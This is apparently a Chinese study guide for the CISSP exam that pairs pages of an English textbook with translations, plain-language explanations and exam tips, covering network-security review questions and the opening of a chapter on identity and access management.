防火墙:防火墙根据规则控制网络流量进出。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 76 / PDF P913

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

12. The CISO is concerned that the use of subnets as the only form of network segments is limiting growth and flexibility of the network. They are considering the implementation of switches to support VLANs but aren't sure VLANs are the best option. Which of the following is not a benefit of VLANs? A. Traffic isolation B. Data/traffic encryption C. Traffic management D. Reduced vulnerability to sniffers 13. The CISO has tasked you to design and implement an IT port security strategy. While researching the options, you realize there are several potential concepts that are labeled as port security. You prepare a report to present options to the CISO.

Which of the following are port security concepts you should include on this report? (Choose all that apply.) A. Shipping container storage B. NAC C. Transport Layer D. RJ-45 jacks 14. ______________ is the oversight and management of the efficiency and performance of network communications. Items to measure include throughput rate, bit rate, packet loss, latency, jitter, transmission delay, and availability. A. VPN B. QoS C. SDN D. Sniffing 15. You are configuring a VPN to provide secure communications between systems. You want to minimize the information left in plaintext by the encryption mechanism of the chosen solution.

Which IPSec mode provides for encryption of complete packets, including header information? A. Transport 12.

中文直译 / 整理

首席信息安全官担心仅使用子网作为 网络分段是限制网络扩展性和灵活性的。 他们正在考虑部署交换机以支持 VLAN,但不确定VLAN是否是最佳选择。 以下哪一项不是VLAN的优势? A. 流量隔离 B. 数据/流量加密 C. 流量管理 D. 降低被嗅探器攻击的脆弱性 13. CISO 已委托您设计并实施一项 IT 端口安全策略。 在研究各种选项时,您发现有几种被称为端口安全的概念。 您准备了 一份报告,向 CISO 呈现这些选项。 以下哪些是您应在报告中包含的端口安全概念? (选择所有适用的选项。 ) 潜在的被标记为端口安全的概念。 您准备了一份报告,向 CISO 呈现这些选 项。 以下哪些是您应在报告中包含的端口安全概念? (选择所有适用的选项。 ) A. 集装箱存储 B. NAC C. 传输层 D. RJ‑45 接口 14. ______________ 是对网络通信的效率和性能进行监督与管理。 需测 量的指标包括吞吐率、比特率、丢包率、延迟、抖动、传输延迟和可用性。 A. VPN B. QoS C. SDN D. Sniffing 15. 您正在配置一个VPN,以在系统之间提供安全通信。

您希望尽量减少所 选解决方案的加密机制留下的明文信息。 哪种IPSec模式能对整个数据包 (包括头部)进行加密? 信息? A. 运输

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

IPS 放在线路中,误报可能影响可用性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 77 / PDF P914

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

B. Encapsulating Security Payload C. Authentication Header D. Tunnel 16. Internet Protocol Security (IPSec) is a standard of IP security extensions used as an add-on for IPv4 and integrated into IPv6. What IPSec component provides assurances of message integrity and identity verification? A. Authentication Header B. Encapsulating Security Payload C. IP Payload Compression protocol D. Internet Key Exchange 17. When you're designing a security system for Internet-delivered email, which of the following is least important? A. Nonrepudiation B. Data remanent destruction C. Message integrity D. Access restriction 18. You have been tasked with crafting the organization's email retention policy.

Which of the following is typically not an element that must be discussed with end users in regard to email retention policies? A. Privacy B. Auditor review C. Length of retainer D. Backup method 19. Modern networks are built on multilayer protocols, such as TCP/IP. This provides for flexibility and resiliency in complex network structures. All of the following are implications of multilayer protocols except which one? A. VLAN hopping B. Multiple encapsulation B.

中文直译 / 整理

封装安全有效载荷 C. 认证头 D. 隧道 16. Internet Protocol Security (IPSec) 是一种 IP 安全扩展标准,用作 IPv4 的附加组件,并集成到 IPv6 中。 IPSec 的哪个组件提供消息完整性与 身份验证的保障? A. 认证头 B. 封装安全有效载荷 C. IP 负载压缩协议 D. 因特网密钥交换 17. 在设计用于互联网传送的电子邮件的安全系统时,以下哪一项最重要性最 低? A. 不可否认性性 B. 数据残留清除 C. 报文完整性 D. 访问限制 18. 您被 tasked 以制定组织的电子邮件保留策略。 以下哪一项通常不是在 电子邮件保留策略方面必须与最终用户讨论的要素? A. 隐私 B. 审计员审查 C. 保留期限 D. 备份方法 19. 现代网络基于多层协议构建,例如 TCP/IP。 这 p提供灵活性 y 和弹性 y 在复 p杂的网络结构中。 所有 以下都是多层协议的含义,除了哪一项 one? A. VLAN 跳跃 B. 多重封装

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
保留期限 保留期限规定数据、日志或记录要保存多久。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 78 / PDF P915

第 915 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. Filter evasion using tunneling D. Static IP addressing 20. Which of the following is a type of connection that can be described as a logical circuit that always exists and is waiting for the customer to send data? A. SDN B. PVC C. VPN D. SVC C.

中文直译 / 整理

使用隧道技术规避过滤 D. 静态IP地址分配 20. 以下哪种连接类型可以描述为始终存在并等待客户发送数据的逻辑电路? A. SDN B. PVC C. VPN D. SVC

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 915 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
第 13 章 · P917-967 · 51 个学习单元

管理身份和身份验证

OSG10 · Chapter 13 · Managing Identity and Authentication · 全文覆盖 + 小白精读 + 画报

第 13 章:管理身份和身份验证

这不是提炼版。本页按 PDF 第 917-967 页连续覆盖第 13 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

51个连续学习单元
4格原文 / 直译 / 解释 / 考点
51页覆盖第13章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P917

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 5.0: Identity and Access Management (IAM) 5.1 Control physical and logical access to assets 5.1.1 Information 5.1.2 Systems 5.1.3 Devices 5.1.4 Facilities 5.1.5 Applications 5.1.6 Services 5.2 Design identification and authentication strategy (e.g., people, devices, and services) 5.2.1 Groups and Roles 5.2.2 Authentication, Authorization and Accounting (AAA) (e.g., multi-factor authentication (MFA), password-less authentication) 5.2.3 Session management 5.2.4 Registration, proofing, and establishment of identity 5.2.5 Federated Identity Management (FIM) 5.2.6 Credential management systems (e.g., Password vault) 5.2.7 Single Sign On (SSO) 5.2.8 Just-In-Time 5.3 Federated identity with a third-party service 5.3.1 On-premise 5.3.2 Cloud 5.3.3 Hybrid 5.5 Manage the identity and access provisioning lifecycle 5.5.1 Account access review (e.g., user, system, service)

中文直译 / 整理

本章涵盖的CISSP主题包括: 域5.0:身份与访问管理(IAM) 5.1 控制对资产的物理和逻辑访问 5.1.1 信息 5.1.2 系统 5.1.3 设备 5.1.4 设施 5.1.5 应用 5.1.6 服务 5.2 设计识别与身份验证策略(例如,人员、设备和服务) 5.2.1 组与角色 5.2.2 身份验证、授权和计费(AAA)(例如,多因素身份 验证(MFA)、无密码身份验证) 5.2.3 会话管理 5.2.4 注册、身份验证和身份建立 5.2.5 联合身份管理(FIM) 5.2.6 凭据管理系统(例如,密码保险库) 5.2.7 单点登录(SSO) 5.2.8 按需分配 5.3 与第三方服务的联合身份 5.3.1 本地 5.3.2 云 5.3.3 混合 5.5 管理身份和访问配置生命周期 5.5.1 账户访问审查(例如,用户、系统、服务)

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 02 / PDF P918

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

5.5.2 Provisioning and deprovisioning (e.g., on/off boarding and transfers) 5.5.3 Role definition and transition (e.g., people assigned to new roles) 5.5.5 Service accounts management The Identity and Access Management (IAM) domain focuses on issues related to granting and revoking privileges to access data or perform actions on systems. A primary focus is on identification, authentication, authorization, and accounting. In this chapter and Chapter 14, “Controlling and Monitoring Access,” we discuss all the objectives in the Identity and Access Management domain. Be sure to read and study the materials from both chapters to ensure complete coverage of this domain's essential material.

Controlling Access to Assets Controlling access to assets is one of the central themes of security, and you'll find that many different security controls work together to provide access control. Note that assets can be tangible or intangible. Tangible assets refer to things you can touch, such as physical equipment, whereas intangible assets refer to information and data, such as intellectual property. In addition to personnel, technology assets can be information, systems, devices, facilities, applications, or services: Information An organization's information includes all of its data. Data is stored in simple files on servers, computers, and smaller devices.

It can also be stored in databases within a server farm or the cloud. It can even be paper records maintained in a file cabinet. Logical access controls attempt to prevent unauthorized access to information. Systems An organization's systems include any IT systems that provide one or more services. For example, a simple file server that stores user files is a system. Additionally, a web server working with a database server to provide an e-commerce service is a system. Permissions assigned to user and system accounts control system access. Devices Devices refer to any computing equipment, including networking devices (routers and switches), storage devices (SAN and NAS), computing 5.5.2

中文直译 / 整理

资源调配与撤销(例如,入职和离职及调动) 5.5.3 角色定义与过渡(例如,人员分配到新角色) 5.5.5 服务账户管理 身份和访问管理(IAM)领域重点关注授予和撤销访问数据或在系统上执行 操作权限的相关问题。 其主要关注点包括身份识别、身份验证、授权和审计。 在本章及第14章“访问控制与监控”中,我们将讨论身份和访问管理领域中 的所有目标。 请务必阅读并学习这两章的材料,以全面掌握该领域的重要内 容。 控制对资产的访问 控制对资产的访问是安全的核心主题之一,您会发现许多不同的安全控制措施 协同工作以实现访问控制。 请注意,资产可以是有形的或无形的。 有形资产指 您可以触摸到的物品,例如物理设备; 无形资产则指信息和数据,例如知识产 权。 除了人员之外,技术资产还可以是信息、系统、设备、设施、应用程序或 服务: 信息 一个组织的信息包括其所有数据。 数据存储在服务器、计算机和较小设备 上的简单文件中。 它也可以存储在服务器集群或云端的数据库中。 甚至可以是保 存在文件柜中的纸质记录。 逻辑访问控制旨在防止对信息的未授权访问。 系统 一个组织的系统包括提供一个或多个服务的任何IT系统。

例如,存储用户文 件的简单文件服务器就是一个系统。 此外,与数据库服务器协同提供电子商务服 务的Web服务器也是一个系统。 分配给用户和系统账户的权限控制对系统的访问。 设备 设备指任何计算设备,包括网络设备(路由器和交换机)、存储设备(SAN 和 NAS)、计算

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P919

第 919 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

devices (servers, desktop computers, portable laptop computers, tablets, and smartphones), and external devices such as printers and scanners. Organizations have increasingly adopted policies allowing employees to connect their personally owned devices (such as smartphones or tablets) to an organization's network. Although the employees may own the devices, organizational data stored on the devices is still an asset of the organization. Facilities An organization's facilities include any physical location that it owns or rents. This could be individual rooms, entire buildings, or whole complexes of several buildings. Physical security controls help protect facilities.

Applications Applications frequently provide access to an organization's data. Controlling access to applications provides an additional layer of control for the organization's data. Permissions are an easy way to restrict logical access to applications and be assigned to specific users or groups. Services Services offered by an organization may include printing capabilities, network capacity, end-user support, and a variety of other offerings. Access control systems ensure that only authorized users gain access to these services. Controlling Physical and Logical Access In addition to understanding what assets need to be protected, you must know how to protect them.

You can do so with physical security controls and logical access controls. Chapter 10, “Physical Security Requirements,” discusses physical security controls in depth. In general, a physical security control is one you can touch, such as perimeter security controls (fences, gates, guards, and turnstiles) and environmental controls such as heating, ventilation, and air-conditioning (HVAC) systems and fire suppression. Physical security controls protect systems, devices, and facilities by controlling access and controlling the environment. As an example, organizations often have a server room where servers are running, and it's common for server rooms to include routers and switches.

The benefit is that server rooms have increased security, such as cipher locks controlling entry into the server room. Desktop computers typically aren't as valuable as servers, but regular physical security controls such as locks provide protection.

中文直译 / 整理

设备(服务器、台式计算机、便携式笔记本电脑、平板电脑和智能手机),以及打印 机和扫描仪等外部设备。 组织越来越多地采用政策,允许员工将个人拥有的设备(如智能手机或平板 电脑)连接到组织的网络。 尽管设备归员工所有,但存储在设备上的组织数 据仍然是组织的资产。 设施 组织的设施包括其拥有或租赁的任何物理场所。 这可能是单个房间、整栋 建筑,或由多栋建筑组成的整个综合体。 物理安全控制有助于保护设施。 应用程序 应用程序通常提供对组织数据的访问。 控制对应用程序的访问为组织的 数据提供了额外的保护层。 权限是限制对应用程序进行逻辑访问的简便方式,可 分配给特定用户或用户组。 服务 组织提供的服务可能包括打印功能、网络容量、终端用户支持以及各 种其他服务。 访问控制系统确保只有授权用户才能访问这些服务。 控制物理和逻辑访问 除了了解需要保护的资产外,您还必须知道如何保护它们。 您可以通过物理安 全控制和逻辑访问控制来实现这一点。 第10章,“物理安全要求”深入讨论了物理安全控制措施。

通常,物理安全控 制是指您可以接触的措施,例如边界安全控制(围栏、门、保安和旋转门)以 及环境控制,如供暖、通风和空调(HVAC)系统和火灾抑制系统。 物理安全控制通过控制访问和环境来保护系统、设备和设施。 例如,组织通常 设有服务器室,服务器在此运行,而服务器室通常还包含路由器和交换机。 其 优势在于服务器室具有更高的安全性,例如使用密码锁控制进入服务器室。 台 式计算机通常不如服务器值钱,但常规的物理安全控制措施,如锁具,仍能提 供保护。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 919 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 04 / PDF P920

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Servers store important information (data), and also many servers host applications accessed by employees throughout the organization. These applications and data enjoy the same benefits from the other physical security controls protecting these servers. Logical access controls are the technical controls used to protect access to information, systems, devices, and applications. They include authentication, authorization, and permissions. Combined, they help prevent unauthorized access to data and configuration settings on systems and other devices. For example, only people who can authenticate on a system or network can access data.

Permissions help ensure only authorized entities can access data. Similarly, logical access controls restrict access to configuration settings on systems and network devices to only authorized individuals. Many of these logical access controls can apply to resources on-site or in the cloud. The CIA Triad and Access Controls One of the primary reasons an organization implements access control mechanisms is to prevent losses. There are three categories of IT loss: loss of confidentiality, integrity, and availability (CIA). Protecting against these losses is so integral to IT security that they are frequently referred to as the CIA Triad (or sometimes the AIC Triad or Security Triad).

Chapter 1, “Security Governance Through Principles and Policies,” covers these in more depth. The following list identifies them in the context of access control: Confidentiality Access controls help ensure that only authorized subjects can access objects. When unauthorized entities can access systems or data, it results in a loss of confidentiality. Integrity Integrity ensures that data or system configurations are not modified without authorization, or if unauthorized changes occur, security controls detect the changes. If unauthorized or unwanted changes to objects occur, the result is a loss of integrity.

Availability Authorized requests for objects must be granted to subjects within a reasonable amount of time. In other words, systems and data should be available to users and other authorized subjects when they are needed. If the systems are not operational or the data is not accessible, the result is a loss of availability. The AAA Model

中文直译 / 整理

服务器存储重要信息(数据),并且许多服务器托管着组织内员工访问 的应用程序。 这些应用程序和数据同样受益于保护这些服务器的其他物 理安全控制措施。 逻辑访问控制是用于保护对信息、系统、设备和应用程序访问的技术控制措施。 它们包括身份验证、授权和权限。 这些措施共同作用,有助于防止未经授权的 人员访问系统和其他设备上的数据和配置设置。 例如,只有能够通过系统或网 络身份验证的人员才能访问数据。 权限确保只有经过授权的实体才能访问数据。 同样,逻辑访问控制将系统和网络设备上的配置设置访问权限限制为仅限授权 人员。 这些逻辑访问控制中的许多措施可应用于本地或云端的资源。 CIA三元组与访问控制 组织实施访问控制机制的主要原因之一是防止损失。 IT损失分为三类:机密性 机密性、完整性和可用性(CIA)。 防止这些损失对IT安全至关重要,因此它 们常被称为CIA三元组(有时也称为AIC三元组或安全三元组)。 第1章“通过 原则与策略实现安全治理”对此进行了更深入的介绍。 以下列表在访问控制的 背景下明确了它们: 机密性 访问控制有助于确保只有授权主体才能访问对象。 当未经授权的实体能 够访问系统或数据时,会导致机密性丧失。

完整性 完整性确保数据或系统配置未经授权不得被修改,或者如果发生未经授 权的更改,安全控制能够检测到这些更改。 如果对象发生未经授权或非预期的 更改,结果就是完整性丧失。 可用性 对象的授权请求必须在合理的时间内授予主体。 换句话说,当用户和其他 授权主体需要时,系统和数据应可供使用。 如果系统无法运行或数据无法访问, 则会导致可用性丧失。 AAA 模型

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 05 / PDF P921

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

The core functions of identity and access management systems are: Authenticating users, systems, services, and other subjects to confirm they are who they claim to be Authorizing actions attempted by those entities Accounting for activity by maintaining an audit trail Together, these three core functions are described as the AAA (or “Triple-A”) model of access control. Identification and Authentication Strategy Identification is the process of a subject claiming, or professing, an identity. A subject must provide an identity to a system to start the authentication, authorization, and accounting processes.

